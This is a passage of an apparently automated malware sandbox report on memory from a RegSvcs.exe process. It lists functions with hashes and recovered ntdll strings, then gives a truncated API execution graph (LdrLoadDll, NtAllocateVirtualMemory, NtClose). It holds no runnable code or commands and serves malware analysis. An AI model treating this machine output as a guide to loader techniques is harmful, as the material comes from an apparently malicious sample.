                                                                                                                              • Instruction ID: d3f9c2a0fdab093dd65488b22c783c7cb09acb50179200147a1f3179c9539f5c
                                                                                                                              • Opcode Fuzzy Hash: f2982cc54c820de80a7d80db0399477d896b7c71a296c2c6ee151dacc6875e09
                                                                                                                              • Instruction Fuzzy Hash: 0590027120140502D14071584844786000997E4301F55C012A5065555EC7698ED56B75
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A3010 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 532ab42fba43ab1193ca036fbe6759ec43b211607051630e721fecda57f1c95e
                                                                                                                              • Instruction ID: 9a0548f45d566d2b91ca738c65ec96a6f6e88ccd87f7bfdaf0ca6e6961cdf6f7
                                                                                                                              • Opcode Fuzzy Hash: 532ab42fba43ab1193ca036fbe6759ec43b211607051630e721fecda57f1c95e
                                                                                                                              • Instruction Fuzzy Hash: 0790022120184542D14072584C44B4F410997F5202F95C01AA4157555CCA2589555B31
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A3090 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ff6833b2307028185fa2f55569a0801c19816f0aeea11482fef36410e803ea4d
                                                                                                                              • Instruction ID: a2ef11c06812a93a0c4ce2fa1d5c267da7fc71d595dfd780ebc7be383de3bea8
                                                                                                                              • Opcode Fuzzy Hash: ff6833b2307028185fa2f55569a0801c19816f0aeea11482fef36410e803ea4d
                                                                                                                              • Instruction Fuzzy Hash: 0690022124140902D14071588854747000AD7E4601F55C012A0025555DC7268A656BB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A39B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 163b97b2b019797cb52c5f992741b999a083af54a620c8ffe3ee12ed83a3d618
                                                                                                                              • Instruction ID: b6113a824cabe951f7dbffba76175c3538f116e5db79ac34faecae1f67b3fd7e
                                                                                                                              • Opcode Fuzzy Hash: 163b97b2b019797cb52c5f992741b999a083af54a620c8ffe3ee12ed83a3d618
                                                                                                                              • Instruction Fuzzy Hash: B690022124545202D150715C48446564009B7F4201F55C022A0815595DC66589556731
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A3D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b8c8071b157a6e2dbee54599818c545ad6c33a6cac58a5184f19136d014465af
                                                                                                                              • Instruction ID: 34c1ba37472a43ba141b1a7ef5229eefead231d2ef0a91e6c1d6870dd85a10f8
                                                                                                                              • Opcode Fuzzy Hash: b8c8071b157a6e2dbee54599818c545ad6c33a6cac58a5184f19136d014465af
                                                                                                                              • Instruction Fuzzy Hash: 8D90023520140502D51071585C44686004A97E4301F55D412A0425559DC76489A1A631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A3D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 21772f7dcbc873dfaab6a23c3509552f6e504e1012c7cfeb84559d133f1051bd
                                                                                                                              • Instruction ID: b52ea55d1583ce5358fd2e701e8fdd19af4d8127041cb5a6cec5211e9f838ec9
                                                                                                                              • Opcode Fuzzy Hash: 21772f7dcbc873dfaab6a23c3509552f6e504e1012c7cfeb84559d133f1051bd
                                                                                                                              • Instruction Fuzzy Hash: 9590023120240242954072585C44A8E410997F5302B95D416A0016555CCA2489615731
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction ID: a2b4e27ef477884cdf914af3e1defc8872726b59b345827ea3a3634443c29430
                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 1d202cb3a5e32f8379ef075c8ace8580d2e77a609b1f2a99269eb783c5a55e34
                                                                                                                              • Instruction ID: f24385fa1f14327eab5c8545c8ff93e9336f4b2de8df55aadcc53bf5294898b6
                                                                                                                              • Opcode Fuzzy Hash: 1d202cb3a5e32f8379ef075c8ace8580d2e77a609b1f2a99269eb783c5a55e34
                                                                                                                              • Instruction Fuzzy Hash: 0E51F4B2A00116AFCB11DF9D899097FFBB8BB28240B95822FF465D7651D374DE0097A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01512410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 73c1d48175063a5ccf68c8260300b7dac39435962c33b076b21b5a34d20bcdda
                                                                                                                              • Instruction ID: c409bd1759888d487f807f324dad64a2b0d95922ff99f382ecc4e1c403ad9bf9
                                                                                                                              • Opcode Fuzzy Hash: 73c1d48175063a5ccf68c8260300b7dac39435962c33b076b21b5a34d20bcdda
                                                                                                                              • Instruction Fuzzy Hash: 69510975A006456EEB36DF5DC8D097FB7F8FB44200F24885EE496CB646E6B4DA40C760
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01497630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • Execute=1, xrefs: 014D4713
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 014D4655
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014D46FC
                                                                                                                              • ExecuteOptions, xrefs: 014D46A0
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 014D4725
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 014D4787
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 014D4742
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: 61170145ef6683c9c06a935bc28ce51ddd2205b8145b97c5082b2d3653f702b7
                                                                                                                              • Instruction ID: 05890b60ed7d50daea901da674c314c1aa5ff2d1110925e3dd6e9432d452182f
                                                                                                                              • Opcode Fuzzy Hash: 61170145ef6683c9c06a935bc28ce51ddd2205b8145b97c5082b2d3653f702b7
                                                                                                                              • Instruction Fuzzy Hash: DD513C316002196BEF109BA9DC55FAE7FA8AF64311F1800DFD609AB2B1E770AE458F50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01536940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                              • Instruction ID: d58dec9e60ad385eb6fcb4cd023f4356ae3115c7e708eb19aba850cfa3428976
                                                                                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                              • Instruction Fuzzy Hash: 080225B1508342AFD309CF19C490A6FBBE5FFD8700F45892DB9998B260DB31EA05CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction ID: 923cf12ae9efa7531cb3b2e363759f1b38e22c469a27cdc2ae4d714ca512a77d
                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction Fuzzy Hash: 8E81CF74E052498EEF258E6CC8907FEBFB1EF65320F9A421FD865A73A1C77088418B51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 015120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              • Opcode ID: 863252eeebdc77287db545d8c64a826e80f1941fc6447beb62385360423d499b
                                                                                                                              • Instruction ID: 08e334d1712671662bfb4fee34566518e3a0ecd0156483ef53ee26c3461863a7
                                                                                                                              • Opcode Fuzzy Hash: 863252eeebdc77287db545d8c64a826e80f1941fc6447beb62385360423d499b
                                                                                                                              • Instruction Fuzzy Hash: 6121657AE00119ABEB11DF79DC40AEEBBF9FF64650F55011AE905E7205E730D9018BA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0148F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014D02E7
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014D02BD
                                                                                                                              • RTL: Re-Waiting, xrefs: 014D031E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: d2901e8db2a4cc80c76c4061776e6239edd8ee7a2620167fd1e07704b048d9b7
                                                                                                                              • Instruction ID: 40d832e4bdc82dd54d7acb402d48a98251a82c5184a1f748a25ba4b341b63b00
                                                                                                                              • Opcode Fuzzy Hash: d2901e8db2a4cc80c76c4061776e6239edd8ee7a2620167fd1e07704b048d9b7
                                                                                                                              • Instruction Fuzzy Hash: 47E1AE306047419FEB25EF28C894B2ABBE0BB94314F140A1EF5A59B3F1D774D94ACB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 014D7B7F
                                                                                                                              • RTL: Resource at %p, xrefs: 014D7B8E
                                                                                                                              • RTL: Re-Waiting, xrefs: 014D7BAC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              • Opcode ID: dc0fed8fe004c51f5464cb9ba4a479fe692b7e1b806b735a8d79f6f4b7d660a4
                                                                                                                              • Instruction ID: 64b5f2709c0da44d449f6512800f89b8b023c0f6d92d074e4efc19103be2fa9c
                                                                                                                              • Opcode Fuzzy Hash: dc0fed8fe004c51f5464cb9ba4a479fe692b7e1b806b735a8d79f6f4b7d660a4
                                                                                                                              • Instruction Fuzzy Hash: 9341D3313007029BDB20DE29D850F6BBBE5EB98715F100A1FE956DB7A0DB71E8058B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014D728C
                                                                                                                              Strings
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 014D7294
                                                                                                                              • RTL: Resource at %p, xrefs: 014D72A3
                                                                                                                              • RTL: Re-Waiting, xrefs: 014D72C1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              • Opcode ID: 0e80492b66e8d8def4cda4d2cad81336b7e9d1be75971ca97b4ccd1330600b8b
                                                                                                                              • Instruction ID: 71d3fd69455e73249e7976e36cd806d5712e219e6c0d196c36404fbc18680974
                                                                                                                              • Opcode Fuzzy Hash: 0e80492b66e8d8def4cda4d2cad81336b7e9d1be75971ca97b4ccd1330600b8b
                                                                                                                              • Instruction Fuzzy Hash: CA41E131600242ABDB21DF29DC41F6ABBA5FBA4715F10062FF955AB360DB31F81687D1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01512300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              • Opcode ID: bd76e3f2cba962ecd48bdf1e8c292bb225366d852373681929569bc901e07c24
                                                                                                                              • Instruction ID: e214209e07a30a5325632924ce7421578364effcc35c6ebd8fa4a372d8a06342
                                                                                                                              • Opcode Fuzzy Hash: bd76e3f2cba962ecd48bdf1e8c292bb225366d852373681929569bc901e07c24
                                                                                                                              • Instruction Fuzzy Hash: 8A318672A002199FDB21DF2DCC40BEEB7F8FB54650F95455AE949E7204EB30EA548BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction ID: e87cd1599d464c4784e9cc9a06c035b6b58d5a9a174862ef313c33916cf4d104
                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction Fuzzy Hash: 9F91C470E002069AEF34CF6DC8906BFBBA5EF64322F96451BF955A73E0D7328A418750
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01469126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              • Opcode ID: e2ebbe01d13f050b94f3e5bc1ba1681ba67e40acbaf8dd72d794407fe656ff9d
                                                                                                                              • Instruction ID: a7170047f3e59c477012b1ad0b914311e9f7f6a4dfee6ebf2f2e477aa9a63057
                                                                                                                              • Opcode Fuzzy Hash: e2ebbe01d13f050b94f3e5bc1ba1681ba67e40acbaf8dd72d794407fe656ff9d
                                                                                                                              • Instruction Fuzzy Hash: 9D813C75D00269DBDB31CB54CC44BEEBAB8AB18714F0441EBEA19B7250D7B09E85CF60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014ECEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 014ECFBD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                              • String ID: @$@4rw@4rw
                                                                                                                              • API String ID: 4062629308-2979693914
                                                                                                                              • Opcode ID: 7c7dcda6381686ca62b411e0ab726d7dbd1b8e080d1767dd2ecc90a483f84f02
                                                                                                                              • Instruction ID: c91ef5d3ff6a5d5e26fc42608a9efff9e5272a269eb60e1b09c536c0606dfc06
                                                                                                                              • Opcode Fuzzy Hash: 7c7dcda6381686ca62b411e0ab726d7dbd1b8e080d1767dd2ecc90a483f84f02
                                                                                                                              • Instruction Fuzzy Hash: 5C419AB1D00215DFDB219FAAC894AAEBBF8FF65B54F04402FE914DB264E7708801DB61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:3%
                                                                                                                              Dynamic/Decrypted Code Coverage:2.4%
                                                                                                                              Signature Coverage:3%
                                                                                                                              Total number of Nodes:930
                                                                                                                              Total number of Limit Nodes:118
                                                                                                                              execution_graph 95972 2a4b4a0 95973 2a4b4c8 95972->95973 96003 2a57130 95973->96003 95975 2a4b528 95976 2a4b531 95975->95976 96006 2a4a800 95975->96006 95978 2a4b55a 95979 2a4b57a 95978->95979 96036 2a4ab50 LdrLoadDll 95978->96036 95981 2a4b598 95979->95981 96038 2a4d320 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 95979->96038 95988 2a4b5b2 95981->95988 96040 2a44310 LdrLoadDll 95981->96040 95983 2a4b568 95983->95979 96037 2a4b1d0 LdrLoadDll RtlFreeHeap 95983->96037 95984 2a4b58c 96039 2a4d320 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 95984->96039 95989 2a4a800 4 API calls 95988->95989 95990 2a4b5df 95989->95990 95991 2a4b600 95990->95991 96041 2a4ab50 LdrLoadDll 95990->96041 95993 2a4b61e 95991->95993 96043 2a4d320 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 95991->96043 95996 2a4b638 95993->95996 96045 2a44310 LdrLoadDll 95993->96045 95994 2a4b5ee 95994->95991 96042 2a4b1d0 LdrLoadDll RtlFreeHeap 95994->96042 96046 2a57050 95996->96046 95998 2a4b612 96044 2a4d320 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 95998->96044 96049 2a55500 96003->96049 96005 2a5714b 96005->95975 96007 2a4a898 96006->96007 96063 2a444a0 96007->96063 96009 2a4a95e 96010 2a444a0 LdrLoadDll 96009->96010 96011 2a4a98a 96010->96011 96068 2a45dd0 96011->96068 96014 2a4aaf9 96016 2a4ab0d 96014->96016 96072 2a4a170 96014->96072 96016->95978 96019 2a4aaef 96020 2a55240 2 API calls 96019->96020 96020->96014 96021 2a4a9e8 96086 2a55240 96021->96086 96023 2a4aa22 96090 2a57210 LdrLoadDll 96023->96090 96025 2a4aa5b 96025->96016 96026 2a45dd0 2 API calls 96025->96026 96027 2a4aa81 96026->96027 96027->96016 96028 2a54cc0 2 API calls 96027->96028 96029 2a4aaa6 96028->96029 96030 2a4aaad 96029->96030 96031 2a4aad9 96029->96031 96032 2a55240 2 API calls 96030->96032 96033 2a55240 2 API calls 96031->96033 96034 2a4aab7 96032->96034 96035 2a4aae3 96033->96035 96034->95978 96035->95978 96036->95983 96037->95979 96038->95984 96039->95981 96040->95988 96041->95994 96042->95991 96043->95998 96044->95993 96045->95996 96104 2a55550 96046->96104 96048 2a4b642 96050 2a5551d 96049->96050 96053 2a56230 96050->96053 96052 2a5552e RtlAllocateHeap 96052->96005 96054 2a5623f 96053->96054 96056 2a562a5 96053->96056 96054->96056 96057 2a50c00 96054->96057 96056->96052 96058 2a50c1a 96057->96058 96059 2a50c0e 96057->96059 96058->96056 96059->96058 96062 2a51080 LdrLoadDll 96059->96062 96061 2a50d6c 96061->96056 96062->96061 96064 2a444c5 96063->96064 96067 2a444d0 96064->96067 96091 2a443e0 96064->96091 96066 2a44518 96066->96009 96067->96009 96069 2a45df5 96068->96069 96096 2a54c10 96069->96096 96073 2a4a195 96072->96073 96074 2a444a0 LdrLoadDll 96073->96074 96075 2a4a277 96074->96075 96076 2a444a0 LdrLoadDll 96075->96076 96077 2a4a2af 96076->96077 96078 2a444a0 LdrLoadDll 96077->96078 96079 2a4a36e 96077->96079 96078->96079 96079->96016 96080 2a54cc0 96081 2a54cdd 96080->96081 96082 2a56230 LdrLoadDll 96081->96082 96083 2a54cee 96082->96083 96103 4ab2be0 LdrInitializeThunk 96083->96103 96084 2a4a9dd 96084->96019 96084->96021 96087 2a5525d 96086->96087 96088 2a56230 LdrLoadDll 96087->96088 96089 2a5526e NtClose 96088->96089 96089->96023 96090->96025 96092 2a44404 96091->96092 96095 2a54430 LdrLoadDll 96092->96095 96094 2a4443e 96094->96066 96095->96094 96097 2a54c2a 96096->96097 96098 2a56230 LdrLoadDll 96097->96098 96099 2a54c3b 96098->96099 96102 4ab2c60 LdrInitializeThunk 96099->96102 96100 2a45e69 96100->96014 96100->96080 96102->96100 96103->96084 96105 2a5556d 96104->96105 96106 2a56230 LdrLoadDll 96105->96106 96107 2a5557e RtlFreeHeap 96106->96107 96107->96048 96108 2a49f20 96113 2a49c50 96108->96113 96110 2a49f2d 96133 2a498f0 96110->96133 96112 2a49f33 96114 2a49c75 